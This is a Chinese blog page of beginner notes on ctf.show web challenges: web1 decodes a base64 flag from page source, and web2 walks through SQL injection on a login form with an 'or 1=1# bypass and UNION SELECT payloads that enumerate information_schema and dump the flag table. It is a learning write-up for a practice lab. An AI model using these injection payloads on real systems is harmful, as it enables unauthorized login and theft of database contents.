- 1【MySQL新手入门系列五】:MySQL的高级特性简介及MySQL的安全简介_mysql除了关安全模式还要干嘛
- 2OpenCV 验证码图像增强处理 一、滤波增强_opencv 边缘增强
- 3Vue3全家桶 - Vue3 - 【2】声明响应式数据(ref + reactive + toRef + toRefs)
- 4微信开发中两种access_token的区别和不同用处总结_如何将测试正式的微信access_token 区分开
- 5Android 插件化开发(五)—— Replugin内部插件开发
- 6将.Net Framework 程序升级到.NetCore_.net framework升级.net core
- 7Linux centos7安装postgresql12_linux postgres 12 客戶端下载
- 8Python实现学生信息管理系统_利用python语言中的组合数据类型对学号和姓名进行存储,并实现利用学号访问姓名和
- 9homebrew安装及使用nginx_brew install nginx
- 10ASO专家绝不会分享的高级应用商店优化秘密!(2)
ctf.show web笔记_ctf.show web入门笔记
赞
踩
ctf.show web笔记
记录一些web的知识点,本人才刚开始学习web很多资料都是借鉴大佬的,许多复现的过程都是大同小异的,写的菜了请大佬们下手轻点
web1
一道简单的入门题
打开环境发现只有一串英文,flag在哪
按CTRL+u查看源码发现一串字符串:Y3Rmc2hvd3s4YTcwYzcxOS04NmQwLTQ0MTAtOTBjYS0zMjdkNjkxOWQyYzN9
根据特征发现是base64,到在线网站去解密得到flag
flag:ctfshow{8a70c719-86d0-4410-90ca-327d6919d2c3}
web2
提供一些SQL的知识点:
Tables_name:表名
Information_schema.tables:储存MySQL数据库下面的所有表明信息表
Column_name:列名
Information_schema.columns:储存MySQL数据库下面的所有列名信息的表
打开环境是一个登陆界面,输入用户名输入admin,密码随便输入(我输入的是123),然后用burp进行抓包
然后把抓取到的数据发送到Repeater模块,试一下万能密码:’or 1=1#
username=admin’or 1=1#&password=123 发现登录成功(有回显)
接着查看回显位置:username=admin’or 1=1 union select 1,2,3#&password=123
有回显,查找2中的数据库名:username=admin’or 1=1 union select 1,database(),3#&password=123
发现数据库位于web2,查询web2库下的所有表名:username=admin’or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema=‘web2’#&password=123
查询flag表下的列名,回显列名flag:username=admin’or 1=1 union select 1,column_name,3 from information_schema.columns where table_name=‘flag’#&password=123
最后查询列名内容,找到flag:username=admin’or 1=1 union select 1,flag,3 from flag#&password=123
flag:ctfshow{26b1461e-0971-4c2f-9d3a-6230e61cfdb8}
